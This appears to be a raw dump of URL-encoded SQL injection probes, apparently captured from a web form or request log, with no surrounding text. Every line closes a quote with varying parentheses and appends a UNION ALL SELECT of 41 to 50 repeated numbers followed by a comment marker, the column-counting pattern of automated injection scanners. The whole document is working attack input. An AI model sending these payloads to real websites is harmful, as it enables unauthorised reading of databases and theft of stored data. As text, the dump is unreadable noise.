-4418%27%20UNION%20ALL%20SELECT%209518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518--%20 -1622%27%20UNION%20ALL%20SELECT%205787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787%2C5787--%20 -7076%27%20UNION%20ALL%20SELECT%206430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430%2C6430--%20 -1547%27%29%20UNION%20ALL%20SELECT%204491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491%2C4491--%20 -5956%27%29%20UNION%20ALL%20SELECT%208721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721%2C8721--%20 -7090%27%29%20UNION%20ALL%20SELECT%209026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026%2C9026--%20 -8979%27%29%20UNION%20ALL%20SELECT%205579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579%2C5579--%20 -1191%27%29%20UNION%20ALL%20SELECT%208454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454%2C8454--%20 -6619%27%29%20UNION%20ALL%20SELECT%209357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357--%20 -5671%27%29%20UNION%20ALL%20SELECT%204573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573%2C4573--%20 -5291%27%29%20UNION%20ALL%20SELECT%201409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409%2C1409--%20 -6556%27%29%20UNION%20ALL%20SELECT%201297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297%2C1297--%20 -8150%27%29%20UNION%20ALL%20SELECT%205142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142%2C5142--%20 -2527%27%29%29%20UNION%20ALL%20SELECT%202270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270%2C2270--%20 -3617%27%29%29%20UNION%20ALL%20SELECT%209612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612%2C9612--%20 -8839%27%29%29%20UNION%20ALL%20SELECT%203547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547%2C3547--%20 -3112%27%29%29%20UNION%20ALL%20SELECT%208815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815%2C8815--%20 -3730%27%29%29%20UNION%20ALL%20SELECT%202045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045%2C2045--%20 -5989%27%29%29%20UNION%20ALL%20SELECT%203773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773%2C3773--%20 -2987%27%29%29%20UNION%20ALL%20SELECT%201384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384%2C1384--%20 -9806%27%29%29%20UNION%20ALL%20SELECT%203900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900%2C3900--%20 -5764%27%29%29%20UNION%20ALL%20SELECT%203878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878%2C3878--%20 -7813%27%29%29%20UNION%20ALL%20SELECT%208696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696%2C8696--%20 -3654%27%29%29%29%20UNION%20ALL%20SELECT%209880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880%2C9880--%20 -7226%27%29%29%29%20UNION%20ALL%20SELECT%201880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880%2C1880--%20 -6915%27%29%29%29%20UNION%20ALL%20SELECT%209301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301%2C9301--%20 -9067%27%29%29%29%20UNION%20ALL%20SELECT%201934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934%2C1934--%20 -9698%27%29%29%29%20UNION%20ALL%20SELECT%206947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947%2C6947--%20 -8699%27%29%29%29%20UNION%20ALL%20SELECT%201185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185%2C1185--%20 -9746%27%29%29%29%20UNION%20ALL%20SELECT%204119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119%2C4119--%20 -7833%27%29%29%29%20UNION%20ALL%20SELECT%201628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628%2C1628--%20 -3006%27%29%29%29%20UNION%20ALL%20SELECT%201927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927--%20 -8417%27%29%29%29%20UNION%20ALL%20SELECT%202275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275%2C2275--%20 -8795%27%20UNION%20ALL%20SELECT%205202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202%2C5202--%20 -5898%27%20UNION%20ALL%20SELECT%201243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243%2C1243--%20 -8894%27%20UNION%20ALL%20SELECT%204678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678--%20 -4113%27%20UNION%20ALL%20SELECT%209454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454%2C9454--%20 -4745%27%20UNION%20ALL%20SELECT%202725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725%2C2725--%20 -6910%27%20UNION%20ALL%20SELECT%202186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186%2C2186--%20 -9203%27%20UNION%20ALL%20SELECT%209566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566%2C9566--%20 -8793%27%20UNION%20ALL%20SELECT%208922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922%2C8922--%20 -9470%27%20UNION%20ALL%20SELECT%206692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692%2C6692--%20 -9936%27%20UNION%20ALL%20SELECT%203021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021%2C3021--%20 -1437%22%29%20UNION%20ALL%20SELECT%203210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210%2C3210--%20 -3200%22%29%20UNION%20ALL%20SELECT%207390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390%2C7390--%20 -7697%22%29%20UNION%20ALL%20SELECT%203314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314%2C3314--%20 -2083%22%29%20UNION%20ALL%20SELECT%203619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619%2C3619--%20 -5956%22%29%20UNION%20ALL%20SELECT%206740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740%2C6740--%20 -9976%22%29%20UNION%20ALL%20SELECT%205469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469%2C5469--%20 -6393%22%29%20UNION%20ALL%20SELECT%203465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465%2C3465--%20 -7895%22%29%20UNION%20ALL%20SELECT%208423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423%2C8423--%20 -7203%22%29%20UNION%20ALL%20SELECT%203522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522%2C3522--%20 -7249%22%29%20UNION%20ALL%20SELECT%203197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197%2C3197--%20 -4432%22%29%29%20UNION%20ALL%20SELECT%204324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324%2C4324--%20 -8280%22%29%29%20UNION%20ALL%20SELECT%204137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137%2C4137--%20 -4942%22%29%29%20UNION%20ALL%20SELECT%208056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056%2C8056--%20 -8716%22%29%29%20UNION%20ALL%20SELECT%208809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809--%20 -5122%22%29%29%20UNION%20ALL%20SELECT%207807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807%2C7807--%20 -9505%22%29%29%20UNION%20ALL%20SELECT%201778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778%2C1778--%20 